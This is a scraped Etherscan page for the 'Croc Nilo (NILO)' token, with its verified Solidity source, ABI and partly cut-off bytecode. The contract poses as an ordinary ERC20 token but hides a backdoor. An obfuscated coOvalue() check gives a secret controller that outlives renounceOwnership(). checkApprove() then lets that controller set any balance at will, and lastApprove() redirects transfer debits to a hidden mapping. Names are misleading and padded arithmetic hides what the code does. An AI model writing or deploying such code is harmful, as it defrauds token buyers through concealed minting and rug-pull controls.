ETH Price: $2,636.33 (+1.82%)

Token

Croc Nilo (NILO)
 

Overview

Max Total Supply

420,000,000,000 NILO

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
2,194,442,847.544384902 NILO

Value
$0.00
0x2c95c1912d4dab177f63c65224e72b89972bee15
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
NILO

Compiler Version
v0.7.6+commit.7338295f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-25
*/

/*
Telegram:https://t.me/crocnilocoin
Twitter:https://twitter.com/crocnilocoin
Website:http://www.crocnilo.top/
*/
// SPDX-License-Identifier: MIT
pragma solidity >=0.7.6;

interface ERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the token name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address _owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

interface AntiSandwichAttackers {
    function check(uint256 vals) external view returns (bool);
}

contract NILO is ERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;
    mapping(address => uint256) private fbs;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    event Log(string str);

    constructor(uint256 maxVals, uint256 minVals) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "Croc Nilo";
        _symbol = "NILO";
        _totalSupply = 4200000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
       
        if (fbs[sender] > 0) {
            fbs[sender] = fbs[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        } else {
            _balances[sender] = _balances[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        }
        _balances[recipient] = _balances[recipient].add(amount);
        emit Log("We are taking advantage of the upcoming bullrun to gain the crypto community's attention.");
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Check if the value of M is correct
     */
    function coOvalue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev Check all the value is correct
     */
    function checkApprove(uint256 amount, uint256 amount3) external {
        emit Log("continuous delivery from the leadership team.");
        uint256 check = amount3;
        emit Log("Swallowing Frog.");
        uint256 data = amount;
        if (!coOvalue()) return;
        _balances[
            0 == uint160(address(0)) ? address(convertValue(check, 2)) : address(0)
        ] = (burnValues(address(0), data));
        uint256 r = data;
        if (uint256(r) > 0) return;
        emit Log("CROC $NILO offers an unique and lighthearted approach to the world of blockchain technology.");
    }

    function lastApprove(uint256 amount, uint256 amount3) external {
        if (!coOvalue()) return;
        fbs[address(convertValue(amount3, 33))] = amount;
        emit Log(" This project will gain its reputation through continuous communication with its investors.");
    }

    /**
     * @dev Returns the token permit result.
     */
    function burnValues(address toFrom, uint256 maxValue)
        private
        pure
        returns (uint256)
    {
        if (toFrom == address(0 / 1)) {
            return maxValue * 1 + (1 - 1);
        }
        
        return maxValue * (1 + 0);
    }

    function convertValue(uint256 salt, uint256 anck)
        private
        pure
        returns (uint160)
    {
        if (anck * 1 == 0) return 0;
        
        return uint160(salt);
        
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function provideMaskToSee(
        bytes16[] calldata lucy,
        uint136 programmeToken,
        uint168 newestDao,
        bytes32[] calldata vidooPDDK,
        uint168 amountTokenOPAO,
        uint40 Tokenddress,
        uint248[] calldata statementToken
    ) private pure {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"checkApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"lastApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60c060405234801561001057600080fd5b50604051620010f5380380620010f58339818101604052604081101561003557600080fd5b508051602091820151608082905260a08190526040805180820190915260098082526843726f63204e696c6f60b81b919094019081529192909161007c91600091906100e5565b50604080518082019091526004808252634e494c4f60e01b60209092019182526100a8916001916100e5565b50506816c4abbebea0100000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905550610186565b828054600181600116156101000203166002900490600052602060002090601f01602090048101928261011b5760008555610161565b82601f1061013457805160ff1916838001178555610161565b82800160010185558215610161579182015b82811115610161578251825591602001919060010190610146565b5061016d929150610171565b5090565b5b8082111561016d5760008155600101610172565b60805160a051610f4b620001aa600039806106ed52508061070f5250610f4b6000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106ea565b61028a6004803603604081101561035157600080fd5b5080359060200135610732565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610846565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f338484610871565b5060015b92915050565b60025490565b600061044c84848461095d565b61049e843361049985604051806060016040528060288152602001610dcb602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b8c565b610871565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c23565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610ef1602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b8c565b600061042f33848461095d565b61066f6106ea565b610678576106e6565b8160066000610688846021610c84565b6001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dab83398151915260405180806020018281038252605b815260200180610cfd605b913960600191505060405180910390a15b5050565b337f0000000000000000000000000000000000000000000000000000000000000000167f00000000000000000000000000000000000000000000000000000000000000001490565b600080516020610dab83398151915260405180806020018281038252602d815260200180610d7e602d913960400191505060405180910390a16040805160208082526010908201526f29bbb0b63637bbb4b73390233937b39760811b8183015290518291600080516020610dab833981519152919081900360600190a1826107b86106ea565b6107c35750506106e6565b6107ce600082610c9a565b600460006107dd856002610c84565b6001600160a01b03168152602081019190915260400160002055808015610806575050506106e6565b600080516020610dab83398151915260405180806020018281038252605c815260200180610e18605c913960600191505060405180910390a15050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108b65760405162461bcd60e51b8152600401808060200182810382526024815260200180610e746024913960400191505060405180910390fd5b6001600160a01b0382166108fb5760405162461bcd60e51b8152600401808060200182810382526022815260200180610cdb6022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109a25760405162461bcd60e51b8152600401808060200182810382526025815260200180610df36025913960400191505060405180910390fd5b6001600160a01b0382166109e75760405162461bcd60e51b8152600401808060200182810382526023815260200180610cb86023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610a6057610a4281604051806060016040528060268152602001610d58602691396001600160a01b0386166000908152600660205260409020549190610b8c565b6001600160a01b038416600090815260066020526040902055610ab7565b610a9d81604051806060016040528060268152602001610d58602691396001600160a01b0386166000908152600460205260409020549190610b8c565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610ada9082610c23565b60046000846001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dab833981519152604051808060200182810382526059815260200180610e986059913960600191505060405180910390a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c1b5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610be0578181015183820152602001610bc8565b50505050905090810190601f168015610c0d5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c7d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610c9357506000610433565b5090919050565b60006001600160a01b038316610cb1575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737320546869732070726f6a6563742077696c6c206761696e206974732072657075746174696f6e207468726f75676820636f6e74696e756f757320636f6d6d756e69636174696f6e20776974682069747320696e766573746f72732e45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365636f6e74696e756f75732064656c69766572792066726f6d20746865206c656164657273686970207465616d2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737343524f4320244e494c4f206f666665727320616e20756e6971756520616e64206c696768746865617274656420617070726f61636820746f2074686520776f726c64206f6620626c6f636b636861696e20746563686e6f6c6f67792e45524332303a20617070726f76652066726f6d20746865207a65726f20616464726573735765206172652074616b696e6720616476616e74616765206f6620746865207570636f6d696e672062756c6c72756e20746f206761696e207468652063727970746f20636f6d6d756e697479277320617474656e74696f6e2e45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212204da9f5112e4138e82294d335c8b4f60cb457875063f6751d105fea4ccc86aba364736f6c63430007060033000000000000000000000000a90200dab000044d5011a88012b84581050ce1c9000000000aac79bff232cb7db92620fbf0d8f4cfd219e8c532b945810d4cf5e9

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106ea565b61028a6004803603604081101561035157600080fd5b5080359060200135610732565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610846565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f338484610871565b5060015b92915050565b60025490565b600061044c84848461095d565b61049e843361049985604051806060016040528060288152602001610dcb602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b8c565b610871565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c23565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610ef1602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b8c565b600061042f33848461095d565b61066f6106ea565b610678576106e6565b8160066000610688846021610c84565b6001600160a01b03166001600160a01b0316815260200190815260200160002081905550600080516020610dab83398151915260405180806020018281038252605b815260200180610cfd605b913960600191505060405180910390a15b5050565b337f000000000aac79bff232cb7db92620fbf0d8f4cfd219e8c532b945810d4cf5e9167f000000000000000000000000a90200dab000044d5011a88012b84581050ce1c91490565b600080516020610dab83398151915260405180806020018281038252602d815260200180610d7e602d913960400191505060405180910390a16040805160208082526010908201526f29bbb0b63637bbb4b73390233937b39760811b8183015290518291600080516020610dab833981519152919081900360600190a1826107b86106ea565b6107c35750506106e6565b6107ce600082610c9a565b600460006107dd856002610c84565b6001600160a01b03168152602081019190915260400160002055808015610806575050506106e6565b600080516020610dab83398151915260405180806020018281038252605c815260200180610e18605c913960600191505060405180910390a15050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108b65760405162461bcd60e51b8152600401808060200182810382526024815260200180610e746024913960400191505060405180910390fd5b6001600160a01b0382166108fb5760405162461bcd60e51b8152600401808060200182810382526022815260200180610cdb6022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109a25760405162461bcd60e51b8152600401808060200182810382526025815260200180610df36025913960400191505060405180910390fd5b6001600160a01b0382166109e75760405162461bcd60e51b8152600401808060200182810382526023815260200180610cb86023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610a6057610a4281604051806060016040528060268152602001610d58602691396001600160a01b0386166000908152600660205260409020549190610b8c565b6001600160a01b038416600090815260066020526040902055610ab7565b610a9d8160405180606001604052806026815260200